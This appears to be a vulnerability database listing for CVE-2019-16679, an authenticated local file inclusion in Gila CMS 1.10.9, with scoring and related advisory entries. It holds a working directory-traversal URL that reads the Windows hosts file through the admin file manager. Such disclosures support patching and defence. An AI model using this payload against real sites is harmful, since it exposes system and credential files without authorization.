Lucene search
Sainadh JamalpurPACKETSTORM:154578HistorySep 23, 2019 - 12:00 a.m.
Gila CMS Local File Inclusion
2019-09-2300:00:00
Sainadh Jamalpur
packetstormsecurity.com
152
0.007 Low
EPSS
Percentile
81.1%
`# Exploit Title: Authenticated Local File Inclusion(LFI) in GilaCMS
# Google Dork: N/A
# Date: 04-08-2019
# Exploit Author: Sainadh Jamalpur
# Vendor Homepage: https://github.com/GilaCMS/gila
# Software Link: https://github.com/GilaCMS/gila
# Version: 1.10.9
# Tested on: XAMPP version 3.2.2 in Windows 10 64bit,
# CVE : CVE-2019-16679
*********** *Steps to reproduce the Vulnerability* *************
Login into the application as an admin user or equivalent user and go the
below link
http://localhost/gilacms/admin/fm/?f=src../../../../../../../../../WINDOWS/system32/drivers/etc/hosts
################################################################
`
Related
zdt
zdt
Gila CMS < 1.11.1 - Local File Inclusion Vulnerability
2019-09-23 00:00:00
exploitpack
exploitpack
Gila CMS 1.11.1 - Local File Inclusion
2019-09-23 00:00:00
cvelist
cvelist
CVE-2019-16679
2019-09-21 20:00:35
nvd
nvd
CVE-2019-16679
2019-09-21 20:15:10
cve
cve
CVE-2019-16679
2019-09-21 20:15:10
prion
prion
Directory traversal
2019-09-21 20:15:00
exploitdb
exploitdb
Gila CMS < 1.11.1 - Local File Inclusion
2019-09-23 00:00:00